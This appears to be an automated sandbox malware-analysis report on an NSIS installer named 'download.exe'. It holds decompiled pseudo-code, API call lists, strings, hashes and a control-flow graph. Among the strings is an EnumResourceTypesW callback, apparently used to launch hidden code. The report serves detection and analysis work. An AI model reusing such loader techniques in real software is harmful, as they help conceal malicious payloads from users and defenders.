                                                      				signed int _t142;
                                                      				int _t150;
                                                      				void* _t151;
                                                      				intOrPtr* _t153;
                                                      				CHAR* _t156;
                                                      				CHAR* _t157;
                                                      				void* _t159;
                                                      				char* _t160;
                                                      				void* _t163;
                                                      				void* _t164;
                                                      				intOrPtr _t177;
                                                      				char _t189;
                                                      
                                                      				 *(_t164 + 0x18) = 0;
                                                      				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
                                                      				 *(_t164 + 0x20) = 0;
                                                      				 *(_t164 + 0x14) = 0x20;
                                                      				SetErrorMode(0x8001); // executed
                                                      				_t42 = GetVersion() & 0xbfffffff;
                                                      				 *0x7a2f4c = _t42;
                                                      				if(_t42 != 6) {
                                                      					_t119 = E00406315(0);
                                                      					if(_t119 != 0) {
                                                      						 *_t119(0xc00);
                                                      					}
                                                      				}
                                                      				_t156 = "UXTHEME";
                                                      				do {
                                                      					E004062A7(_t156); // executed
                                                      					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
                                                      				} while ( *_t156 != 0);
                                                      				E00406315(0xa);
                                                      				 *0x7a2f44 = E00406315(8);
                                                      				_t47 = E00406315(6);
                                                      				if(_t47 != 0) {
                                                      					_t47 =  *_t47(0x1e);
                                                      					if(_t47 != 0) {
                                                      						 *0x7a2f4f =  *0x7a2f4f | 0x00000040;
                                                      					}
                                                      				}
                                                      				__imp__#17(_t159);
                                                      				__imp__OleInitialize(0); // executed
                                                      				 *0x7a3018 = _t47;
                                                      				SHGetFileInfoA(0x79e500, 0, _t164 + 0x38, 0x160, 0); // executed
                                                      				E00405F7D("Doktorgraden Setup", "NSIS Error");
                                                      				_t51 = GetCommandLineA();
                                                      				_t160 = "\"C:\\Users\\Arthur\\Desktop\\download.exe\"";
                                                      				E00405F7D(_t160, _t51);
                                                      				 *0x7a2f40 = 0x400000;
                                                      				_t53 = _t160;
                                                      				if("\"C:\\Users\\Arthur\\Desktop\\download.exe\"" == 0x22) {
                                                      					 *(_t164 + 0x14) = 0x22;
                                                      					_t53 =  &M007A9001;
                                                      				}
                                                      				_t55 = CharNextA(E00405940(_t53,  *(_t164 + 0x14)));
                                                      				 *(_t164 + 0x1c) = _t55;
                                                      				while(1) {
                                                      					_t122 =  *_t55;
                                                      					_t172 = _t122;
                                                      					if(_t122 == 0) {
                                                      						break;
                                                      					}
                                                      					__eflags = _t122 - 0x20;
                                                      					if(_t122 != 0x20) {
                                                      						L13:
                                                      						__eflags =  *_t55 - 0x22;
                                                      						 *(_t164 + 0x14) = 0x20;
                                                      						if( *_t55 == 0x22) {
                                                      							_t55 =  &(_t55[1]);
                                                      							__eflags = _t55;
                                                      							 *(_t164 + 0x14) = 0x22;
                                                      						}
                                                      						__eflags =  *_t55 - 0x2f;
                                                      						if( *_t55 != 0x2f) {
                                                      							L25:
                                                      							_t55 = E00405940(_t55,  *(_t164 + 0x14));
                                                      							__eflags =  *_t55 - 0x22;
                                                      							if(__eflags == 0) {
                                                      								_t55 =  &(_t55[1]);
                                                      								__eflags = _t55;
                                                      							}
                                                      							continue;
                                                      						} else {
                                                      							_t55 =  &(_t55[1]);
                                                      							__eflags =  *_t55 - 0x53;
                                                      							if( *_t55 != 0x53) {
                                                      								L20:
                                                      								__eflags =  *_t55 - ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC");
                                                      								if( *_t55 != ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC")) {
                                                      									L24:
                                                      									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=");
                                                      									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=")) {
                                                      										 *((char*)(_t55 - 2)) = 0;
                                                      										__eflags =  &(_t55[2]);
                                                      										E00405F7D("C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Heize",  &(_t55[2]));
                                                      										L30:
                                                      										_t157 = "C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
                                                      										GetTempPathA(0x400, _t157);
                                                      										_t59 = E004031B8(_t172);
                                                      										_t173 = _t59;
                                                      										if(_t59 != 0) {
                                                      											L33:
                                                      											DeleteFileA("1033"); // executed
                                                      											_t61 = E00402D63(_t175,  *(_t164 + 0x20)); // executed
                                                      											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
                                                      											if(_t61 != 0) {
                                                      												L43:
                                                      												E004036D1();
                                                      												__imp__OleUninitialize();
                                                      												_t185 =  *((intOrPtr*)(_t164 + 0x10));
                                                      												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
                                                      													__eflags =  *0x7a2ff4; // 0x0
                                                      													if(__eflags == 0) {
                                                      														L67:
                                                      														_t63 =  *0x7a300c;
                                                      														__eflags = _t63 - 0xffffffff;
                                                      														if(_t63 != 0xffffffff) {
                                                      															 *(_t164 + 0x14) = _t63;
                                                      														}
                                                      														ExitProcess( *(_t164 + 0x14));
                                                      													}
                                                      													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
                                                      													__eflags = _t66;
                                                      													_t150 = 2;
                                                      													if(_t66 != 0) {
                                                      														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
                                                      														 *(_t164 + 0x38) = 1;
                                                      														 *(_t164 + 0x44) = _t150;
                                                      														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
                                                      													}
                                                      													_t67 = E00406315(4);
                                                      													__eflags = _t67;
                                                      													if(_t67 == 0) {
                                                      														L65:
                                                      														_t68 = ExitWindowsEx(_t150, 0x80040002);
                                                      														__eflags = _t68;
                                                      														if(_t68 != 0) {
                                                      															goto L67;
                                                      														}
                                                      														goto L66;
                                                      													} else {
                                                      														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
                                                      														__eflags = _t70;
                                                      														if(_t70 == 0) {
                                                      															L66:
                                                      															E0040140B(9);
                                                      															goto L67;
                                                      														}
                                                      														goto L65;
                                                      													}
                                                      												}
                                                      												E00405699( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
                                                      												ExitProcess(2);
                                                      											}
                                                      											_t177 =  *0x7a2f60; // 0x0
                                                      											if(_t177 == 0) {
                                                      												L42:
                                                      												 *0x7a300c =  *0x7a300c | 0xffffffff;
                                                      												 *(_t164 + 0x18) = E004037AB( *0x7a300c);
                                                      												goto L43;
                                                      											}
                                                      											_t153 = E00405940(_t160, 0);
                                                      											if(_t153 < _t160) {
                                                      												L39:
                                                      												_t182 = _t153 - _t160;
                                                      												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
                                                      												if(_t153 < _t160) {
                                                      													_t151 = E00405604(_t185);
                                                      													lstrcatA(_t157, "~nsu");
                                                      													if(_t151 != 0) {
                                                      														lstrcatA(_t157, "A");
                                                      													}
                                                      													lstrcatA(_t157, ".tmp");
                                                      													_t162 = "C:\\Users\\Arthur\\Desktop";
                                                      													if(lstrcmpiA(_t157, "C:\\Users\\Arthur\\Desktop") != 0) {
                                                      														_push(_t157);
                                                      														if(_t151 == 0) {
                                                      															E004055E7();
                                                      														} else {
                                                      															E0040556A();
                                                      														}
                                                      														SetCurrentDirectoryA(_t157);
                                                      														_t189 = "C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Heize"; // 0x43
                                                      														if(_t189 == 0) {
                                                      															E00405F7D("C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Heize", _t162);
                                                      														}
                                                      														E00405F7D("kernel32::EnumResourceTypesW(i 0,i r1,i 0)",  *(_t164 + 0x1c));
                                                      														_t137 = "A";
                                                      														_t163 = 0x1a;
                                                      														do {
                                                      															_t86 =  *0x7a2f54; // 0xae4de0
                                                      															E00405F9F(0, 0x79e100, _t157, 0x79e100,  *((intOrPtr*)(_t86 + 0x120)));
                                                      															DeleteFileA(0x79e100);
                                                      															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\Arthur\\Desktop\\download.exe", 0x79e100, 1) != 0) {
                                                      																E00405D5C(_t137, 0x79e100, 0);
                                                      																_t92 =  *0x7a2f54; // 0xae4de0
                                                      																E00405F9F(0, 0x79e100, _t157, 0x79e100,  *((intOrPtr*)(_t92 + 0x124)));
                                                      																_t94 = E0040561C(0x79e100);
                                                      																if(_t94 != 0) {
                                                      																	CloseHandle(_t94);
                                                      																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
                                                      																}
                                                      															}
                                                      															"77791232" =  &("77791232"[1]);
                                                      															_t163 = _t163 - 1;
                                                      														} while (_t163 != 0);
                                                      														E00405D5C(_t137, _t157, 0);
                                                      													}
                                                      													goto L43;
                                                      												}
                                                      												 *_t153 = 0;
                                                      												_t154 = _t153 + 4;
                                                      												if(E00405A03(_t182, _t153 + 4) == 0) {
                                                      													goto L43;
                                                      												}
                                                      												E00405F7D("C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Heize", _t154);
                                                      												E00405F7D("C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Heize", _t154);
                                                      												 *((intOrPtr*)(_t164 + 0x10)) = 0;
                                                      												goto L42;
                                                      											}
                                                      											_t110 = (( *0x40a15b << 0x00000008 |  *0x40a15a) << 0x00000008 |  *0x40a159) << 0x00000008 | " _?=";
                                                      											while( *_t153 != _t110) {
                                                      												_t153 = _t153 - 1;
                                                      												if(_t153 >= _t160) {
                                                      													continue;
                                                      												}
                                                      												goto L39;
                                                      											}
                                                      											goto L39;
                                                      										}
                                                      										GetWindowsDirectoryA(_t157, 0x3fb);
                                                      										lstrcatA(_t157, "\\Temp");
                                                      										_t113 = E004031B8(_t173);
                                                      										_t174 = _t113;
                                                      										if(_t113 != 0) {
                                                      											goto L33;
                                                      										}
                                                      										GetTempPathA(0x3fc, _t157);
                                                      										lstrcatA(_t157, "Low");
                                                      										SetEnvironmentVariableA("TEMP", _t157);
                                                      										SetEnvironmentVariableA("TMP", _t157);
                                                      										_t118 = E004031B8(_t174);
                                                      										_t175 = _t118;
                                                      										if(_t118 == 0) {
                                                      											goto L43;
                                                      										}
                                                      										goto L33;
                                                      									}
                                                      									goto L25;
                                                      								}
                                                      								_t141 = _t55[4];
                                                      								__eflags = _t141 - 0x20;
                                                      								if(_t141 == 0x20) {
                                                      									L23:
                                                      									_t15 = _t164 + 0x20;
                                                      									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
                                                      									__eflags =  *_t15;
                                                      									goto L24;
                                                      								}
                                                      								__eflags = _t141;
                                                      								if(_t141 != 0) {
                                                      									goto L24;
                                                      								}
                                                      								goto L23;
                                                      							}
                                                      							_t142 = _t55[1];
                                                      							__eflags = _t142 - 0x20;
                                                      							if(_t142 == 0x20) {
                                                      								L19:
                                                      								 *0x7a3000 = 1;
                                                      								goto L20;
                                                      							}
                                                      							__eflags = _t142;
                                                      							if(_t142 != 0) {
                                                      								goto L20;
                                                      							}
                                                      							goto L19;
                                                      						}
                                                      					} else {
                                                      						goto L12;
                                                      					}
                                                      					do {
                                                      						L12:
                                                      						_t55 =  &(_t55[1]);
                                                      						__eflags =  *_t55 - 0x20;
                                                      					} while ( *_t55 == 0x20);
                                                      					goto L13;
                                                      				}
                                                      				goto L30;
                                                      			}
                                                      0x004036b9
                                                      0x004036b9
                                                      0x004036be
                                                      0x004036c1
                                                      0x004036c3
                                                      0x004036c3
                                                      0x004036cb
                                                      0x004036cb
                                                      0x0040364d
                                                      0x00403655
                                                      0x00403657
                                                      0x00403658
                                                      0x00403665
                                                      0x00403678
                                                      0x00403680
                                                      0x00403684
                                                      0x00403684
                                                      0x0040368c
                                                      0x00403691
                                                      0x00403698
                                                      0x004036a6
                                                      0x004036a8
                                                      0x004036ae
                                                      0x004036b0
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040369a
                                                      0x004036a0
                                                      0x004036a2
                                                      0x004036a4
                                                      0x004036b2
                                                      0x004036b4
                                                      0x00000000
                                                      0x004036b4
                                                      0x00000000
                                                      0x004036a4
                                                      0x00403698
                                                      0x00403522
                                                      0x00403529
                                                      0x00403529
                                                      0x00403475
                                                      0x0040347b
                                                      0x004034f3
                                                      0x004034f3
                                                      0x004034ff
                                                      0x00000000
                                                      0x004034ff
                                                      0x00403484
                                                      0x00403488
                                                      0x004034be
                                                      0x004034be
                                                      0x004034c0
                                                      0x004034c8
                                                      0x0040353a
                                                      0x0040353c
                                                      0x00403543
                                                      0x0040354b
                                                      0x0040354b
                                                      0x00403556
                                                      0x0040355b
                                                      0x0040356a
                                                      0x0040356e
                                                      0x0040356f
                                                      0x00403578
                                                      0x00403571
                                                      0x00403571
                                                      0x00403571
                                                      0x0040357e
                                                      0x00403584
                                                      0x0040358a
                                                      0x00403592
                                                      0x00403592
                                                      0x004035a0
                                                      0x004035a5
                                                      0x004035b7
                                                      0x004035c5
                                                      0x004035c5
                                                      0x004035d1
                                                      0x004035d7
                                                      0x004035e1
                                                      0x004035f7
                                                      0x004035fc
                                                      0x00403608
                                                      0x0040360e
                                                      0x00403615
                                                      0x00403618
                                                      0x0040361e
                                                      0x0040361e
                                                      0x00403615
                                                      0x00403622
                                                      0x00403628
                                                      0x00403628
                                                      0x0040362d
                                                      0x0040362d
                                                      0x00000000
                                                      0x0040356a
                                                      0x004034ca
                                                      0x004034cc
                                                      0x004034d7
                                                      0x00000000
                                                      0x00000000
                                                      0x004034df
                                                      0x004034ea
                                                      0x004034ef
                                                      0x00000000
                                                      0x004034ef
                                                      0x004034b3
                                                      0x004034b5
                                                      0x004034b9
                                                      0x004034bc
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004034bc
                                                      0x00000000
                                                      0x004034b5
                                                      0x00403405
                                                      0x00403411
                                                      0x00403416
                                                      0x0040341b
                                                      0x0040341d
                                                      0x00000000
                                                      0x00000000
                                                      0x00403425
                                                      0x0040342d
                                                      0x0040343e
                                                      0x00403446
                                                      0x00403448
                                                      0x0040344d
                                                      0x0040344f
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040344f
                                                      0x00000000
                                                      0x004033b4
                                                      0x00403375
                                                      0x00403378
                                                      0x0040337b
                                                      0x00403381
                                                      0x00403381
                                                      0x00403381
                                                      0x00403381
                                                      0x00000000
                                                      0x00403381
                                                      0x0040337d
                                                      0x0040337f
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040337f
                                                      0x00403330
                                                      0x00403333
                                                      0x00403336
                                                      0x0040333c
                                                      0x0040333c
                                                      0x00000000
                                                      0x0040333c
                                                      0x00403338
                                                      0x0040333a
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040333a
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040330b
                                                      0x0040330b
                                                      0x0040330b
                                                      0x0040330c
                                                      0x0040330c
                                                      0x00000000
                                                      0x0040330b
                                                      0x00000000

                                                      APIs
                                                      • SetErrorMode.KERNELBASE ref: 0040320E
                                                      • GetVersion.KERNEL32 ref: 00403214
                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403247
                                                      • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403283
                                                      • OleInitialize.OLE32(00000000), ref: 0040328A
                                                      • SHGetFileInfoA.SHELL32(0079E500,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004032A6
                                                      • GetCommandLineA.KERNEL32(Doktorgraden Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004032BB
                                                      • CharNextA.USER32(00000000,"C:\Users\user\Desktop\download.exe",00000020,"C:\Users\user\Desktop\download.exe",00000000,?,00000006,00000008,0000000A), ref: 004032F7
                                                      • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 004033F4
                                                      • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403405
                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403411
                                                      • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403425
                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040342D
                                                      • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040343E
                                                      • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403446
                                                      • DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040345A
                                                        • Part of subcall function 00406315: GetModuleHandleA.KERNEL32(?,?,?,0040325C,0000000A), ref: 00406327
                                                        • Part of subcall function 00406315: GetProcAddress.KERNEL32(00000000,?), ref: 00406342
                                                        • Part of subcall function 004037AB: GetUserDefaultUILanguage.KERNELBASE(00000002,75A63410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\download.exe",00000000), ref: 004037C5
                                                        • Part of subcall function 004037AB: lstrlenA.KERNEL32(Call,00000000,00000000,00000000,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize,1033,0079F540,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F540,00000000,00000002,75A63410), ref: 0040389B
                                                        • Part of subcall function 004037AB: lstrcmpiA.KERNEL32(?,.exe), ref: 004038AE
                                                        • Part of subcall function 004037AB: GetFileAttributesA.KERNEL32(Call), ref: 004038B9
                                                        • Part of subcall function 004037AB: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize), ref: 00403902
                                                        • Part of subcall function 004037AB: RegisterClassA.USER32(007A26E0), ref: 0040393F
                                                        • Part of subcall function 004036D1: CloseHandle.KERNEL32(000002DC,00403508,?,?,00000006,00000008,0000000A), ref: 004036DC
                                                      • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 00403508
                                                      • ExitProcess.KERNEL32 ref: 00403529
                                                      • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403646
                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 0040364D
                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403665
                                                      • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403684
                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 004036A8
                                                      • ExitProcess.KERNEL32 ref: 004036CB
                                                        • Part of subcall function 00405699: MessageBoxIndirectA.USER32(0040A218), ref: 004056F4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDefaultDeleteDirectoryErrorImageIndirectInfoInitializeLanguageLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeUserValueVersionlstrcmpi
                                                      • String ID: "$"C:\Users\user\Desktop\download.exe"$.tmp$1033$77791232$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize$C:\Users\user\Desktop$C:\Users\user\Desktop\download.exe$Doktorgraden Setup$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$kernel32::EnumResourceTypesW(i 0,i r1,i 0)$~nsu
                                                      • API String ID: 1314998376-3786389085
                                                      • Opcode ID: e0b5db9666b9a3f6237ddd60c5d2e51e03b24921c130a1ce91c854595f011bcd
                                                      • Instruction ID: 7bf8744e0b649f959f8498b36092dc0538a6711c388ee02d62fe24b7258f1436
                                                      • Opcode Fuzzy Hash: e0b5db9666b9a3f6237ddd60c5d2e51e03b24921c130a1ce91c854595f011bcd
                                                      • Instruction Fuzzy Hash: 42C1E670104741AAD7216F759D89A2F3EACAF86706F04447FF582B51E2DB7C8A058B2F
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      control_flow_graph 134 4051e2-4051fe 135 405204-4052cb GetDlgItem * 3 call 404051 call 404942 GetClientRect GetSystemMetrics SendMessageA * 2 134->135 136 40538d-405393 134->136 154 4052e9-4052ec 135->154 155 4052cd-4052e7 SendMessageA * 2 135->155 138 405395-4053b7 GetDlgItem CreateThread CloseHandle 136->138 139 4053bd-4053c9 136->139 138->139 140 4053eb-4053f1 139->140 141 4053cb-4053d1 139->141 145 4053f3-4053f9 140->145 146 405446-405449 140->146 143 4053d3-4053e6 ShowWindow * 2 call 404051 141->143 144 40540c-405413 call 404083 141->144 143->140 158 405418-40541c 144->158 150 4053fb-405407 call 403ff5 145->150 151 40541f-40542f ShowWindow 145->151 146->144 148 40544b-405451 146->148 148->144 156 405453-405466 SendMessageA 148->156 150->144 159 405431-40543a call 4050a4 151->159 160 40543f-405441 call 403ff5 151->160 161 4052fc-405313 call 40401c 154->161 162 4052ee-4052fa SendMessageA 154->162 155->154 163 405563-405565 156->163 164 40546c-405498 CreatePopupMenu call 405f9f AppendMenuA 156->164 159->160 160->146 173 405315-405329 ShowWindow 161->173 174 405349-40536a GetDlgItem SendMessageA 161->174 162->161 163->158 171 40549a-4054aa GetWindowRect 164->171 172 4054ad-4054c3 TrackPopupMenu 164->172 171->172 172->163 175 4054c9-4054e3 172->175 176 405338 173->176 177 40532b-405336 ShowWindow 173->177 174->163 178 405370-405388 SendMessageA * 2 174->178 179 4054e8-405503 SendMessageA 175->179 180 40533e-405344 call 404051 176->180 177->180 178->163 179->179 181 405505-405525 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 179->181 180->174 183 405527-405547 SendMessageA 181->183 183->183 184 405549-40555d GlobalUnlock SetClipboardData CloseClipboard 183->184 184->163
                                                      C-Code - Quality: 96%
                                                      			E004051E2(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                      				struct HWND__* _v8;
                                                      				struct tagRECT _v24;
                                                      				void* _v32;
                                                      				signed int _v36;
                                                      				int _v40;
                                                      				int _v44;
                                                      				signed int _v48;
                                                      				int _v52;
                                                      				void* _v56;
                                                      				void* _v64;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				struct HWND__* _t87;
                                                      				struct HWND__* _t89;
                                                      				long _t90;
                                                      				int _t95;
                                                      				int _t96;
                                                      				long _t99;
                                                      				void* _t102;
                                                      				intOrPtr _t113;
                                                      				void* _t121;
                                                      				intOrPtr _t124;
                                                      				struct HWND__* _t128;
                                                      				int _t150;
                                                      				int _t153;
                                                      				long _t157;
                                                      				struct HWND__* _t161;
                                                      				struct HMENU__* _t163;
                                                      				long _t165;
                                                      				void* _t166;
                                                      				char* _t167;
                                                      				char* _t168;
                                                      				int _t169;
                                                      
                                                      				_t87 =  *0x7a2724; // 0x1040e
                                                      				_t157 = _a8;
                                                      				_t150 = 0;
                                                      				_v8 = _t87;
                                                      				if(_t157 != 0x110) {
                                                      					__eflags = _t157 - 0x405;
                                                      					if(_t157 == 0x405) {
                                                      						_t121 = CreateThread(0, 0, E00405176, GetDlgItem(_a4, 0x3ec), 0,  &_a8); // executed
                                                      						CloseHandle(_t121);
                                                      					}
                                                      					__eflags = _t157 - 0x111;
                                                      					if(_t157 != 0x111) {
                                                      						L17:
                                                      						__eflags = _t157 - 0x404;
                                                      						if(_t157 != 0x404) {
                                                      							L25:
                                                      							__eflags = _t157 - 0x7b;
                                                      							if(_t157 != 0x7b) {
                                                      								goto L20;
                                                      							}
                                                      							_t89 = _v8;
                                                      							__eflags = _a12 - _t89;
                                                      							if(_a12 != _t89) {
                                                      								goto L20;
                                                      							}
                                                      							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
                                                      							__eflags = _t90 - _t150;
                                                      							_a12 = _t90;
                                                      							if(_t90 <= _t150) {
                                                      								L36:
                                                      								return 0;
                                                      							}
                                                      							_t163 = CreatePopupMenu();
                                                      							AppendMenuA(_t163, _t150, 1, E00405F9F(_t150, _t157, _t163, _t150, 0xffffffe1));
                                                      							_t95 = _a16;
                                                      							__eflags = _a16 - 0xffffffff;
                                                      							_t153 = _a16 >> 0x10;
                                                      							if(_a16 == 0xffffffff) {
                                                      								GetWindowRect(_v8,  &_v24);
                                                      								_t95 = _v24.left;
                                                      								_t153 = _v24.top;
                                                      							}
                                                      							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
                                                      							__eflags = _t96 - 1;
                                                      							if(_t96 == 1) {
                                                      								_t165 = 1;
                                                      								__eflags = 1;
                                                      								_v56 = _t150;
                                                      								_v44 = 0x79f540;
                                                      								_v40 = 0x1000;
                                                      								_a4 = _a12;
                                                      								do {
                                                      									_a4 = _a4 - 1;
                                                      									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
                                                      									__eflags = _a4 - _t150;
                                                      									_t165 = _t165 + _t99 + 2;
                                                      								} while (_a4 != _t150);
                                                      								OpenClipboard(_t150);
                                                      								EmptyClipboard();
                                                      								_t102 = GlobalAlloc(0x42, _t165);
                                                      								_a4 = _t102;
                                                      								_t166 = GlobalLock(_t102);
                                                      								do {
                                                      									_v44 = _t166;
                                                      									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
                                                      									 *_t167 = 0xd;
                                                      									_t168 = _t167 + 1;
                                                      									 *_t168 = 0xa;
                                                      									_t166 = _t168 + 1;
                                                      									_t150 = _t150 + 1;
                                                      									__eflags = _t150 - _a12;
                                                      								} while (_t150 < _a12);
                                                      								GlobalUnlock(_a4);
                                                      								SetClipboardData(1, _a4);
                                                      								CloseClipboard();
                                                      							}
                                                      							goto L36;
                                                      						}
                                                      						__eflags =  *0x7a270c - _t150; // 0x0
                                                      						if(__eflags == 0) {
                                                      							ShowWindow( *0x7a2f48, 8);
                                                      							__eflags =  *0x7a2fec - _t150; // 0x0
                                                      							if(__eflags == 0) {
                                                      								_t113 =  *0x79ed18; // 0xae4f0c
                                                      								_t55 = _t113 + 0x34; // 0xffffffd4
                                                      								E004050A4( *_t55, _t150);
                                                      							}
                                                      							E00403FF5(1);
                                                      							goto L25;
                                                      						}
                                                      						 *0x79e910 = 2;
                                                      						E00403FF5(0x78);
                                                      						goto L20;
                                                      					} else {
                                                      						__eflags = _a12 - 0x403;
                                                      						if(_a12 != 0x403) {
                                                      							L20:
                                                      							return E00404083(_t157, _a12, _a16);
                                                      						}
                                                      						ShowWindow( *0x7a2710, _t150);
                                                      						ShowWindow(_v8, 8);
                                                      						E00404051(_v8);
                                                      						goto L17;
                                                      					}
                                                      				}
                                                      				_v48 = _v48 | 0xffffffff;
                                                      				_v36 = _v36 | 0xffffffff;
                                                      				_t169 = 2;
                                                      				_v56 = _t169;
                                                      				_v52 = 0;
                                                      				_v44 = 0;
                                                      				_v40 = 0;
                                                      				asm("stosd");
                                                      				asm("stosd");
                                                      				_t124 =  *0x7a2f54; // 0xae4de0
                                                      				_t12 = _t124 + 0x5c; // 0x0
                                                      				_t13 = _t124 + 0x60; // 0xff00
                                                      				_a12 =  *_t12;
                                                      				_a8 =  *_t13;
                                                      				 *0x7a2710 = GetDlgItem(_a4, 0x403);
                                                      				 *0x7a2708 = GetDlgItem(_a4, 0x3ee);
                                                      				_t128 = GetDlgItem(_a4, 0x3f8);
                                                      				 *0x7a2724 = _t128;
                                                      				_v8 = _t128;
                                                      				E00404051( *0x7a2710);
                                                      				 *0x7a2714 = E00404942(4);
                                                      				 *0x7a272c = 0;
                                                      				GetClientRect(_v8,  &_v24);
                                                      				_v48 = _v24.right - GetSystemMetrics(_t169);
                                                      				SendMessageA(_v8, 0x101b, 0,  &_v56); // executed
                                                      				SendMessageA(_v8, 0x1036, 0x4000, 0x4000); // executed
                                                      				if(_a12 >= 0) {
                                                      					SendMessageA(_v8, 0x1001, 0, _a12);
                                                      					SendMessageA(_v8, 0x1026, 0, _a12);
                                                      				}
                                                      				if(_a8 >= _t150) {
                                                      					SendMessageA(_v8, 0x1024, _t150, _a8);
                                                      				}
                                                      				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                      				_push(0x1b);
                                                      				E0040401C(_a4);
                                                      				if(( *0x7a2f5c & 0x00000003) != 0) {
                                                      					ShowWindow( *0x7a2710, _t150);
                                                      					if(( *0x7a2f5c & 0x00000002) != 0) {
                                                      						 *0x7a2710 = _t150;
                                                      					} else {
                                                      						ShowWindow(_v8, 8);
                                                      					}
                                                      					E00404051( *0x7a2708);
                                                      				}
                                                      				_t161 = GetDlgItem(_a4, 0x3ec);
                                                      				SendMessageA(_t161, 0x401, _t150, 0x75300000);
                                                      				if(( *0x7a2f5c & 0x00000004) != 0) {
                                                      					SendMessageA(_t161, 0x409, _t150, _a8);
